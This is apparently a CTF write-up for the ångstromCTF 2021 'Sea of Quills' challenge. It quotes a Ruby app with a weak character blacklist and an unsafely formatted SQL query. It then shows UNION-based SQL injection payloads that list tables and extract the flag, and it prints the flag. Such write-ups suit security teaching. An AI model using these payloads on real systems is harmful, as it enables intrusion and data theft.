Rating:

# Sea of Quills

## Description

Come check out our [finest selection of quills](https://seaofquills.2021.chall.actf.co/)!

[app.rb](app.rb)

## Solution

First of all let's analyze the code, we have 3 interesting part:

Some characters are blacklisted

```ruby
blacklist = ["-", "/", ";", "'", "\""]

blacklist.each { |word|
if cols.include? word
return "beep boop sqli detected!"
end
}
```

Field `lim` and `off` must be numeric

```ruby
if !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)
return "bad, no quills for you!"
end
```

There is also a `cols` field
```ruby
@row = db.execute("select %s from quills limit %s offset %s" % [cols, lim, off])
```

Given this information we probably need to do some SQL injection using the `cols` field

In the `/quills` page we cannot see the `cols` field, but by analyzing and edit the HTML code we can remove the hidden tag

![](img1.png)
![](img2.png)

Now we can start with the SQL injection (lim=100, off=0)

First things first, we need to understand where we can find the flag and we can do it by see which table are present in the DB

```SQL
name FROM sqlite_master UNION SELECT url
```

![](img3.png)

There is a `flagtable`, so let's try to get the flag now

```SQL
flag FROM flagtable UNION SELECT url
```

![](img4.png)

#### **FLAG >>** `actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}`

Original writeup (https://github.com/K1nd4SUS/CTF-Writeups/tree/main/%C3%A5ngstromCTF_2021/Sea%20of%20Quills).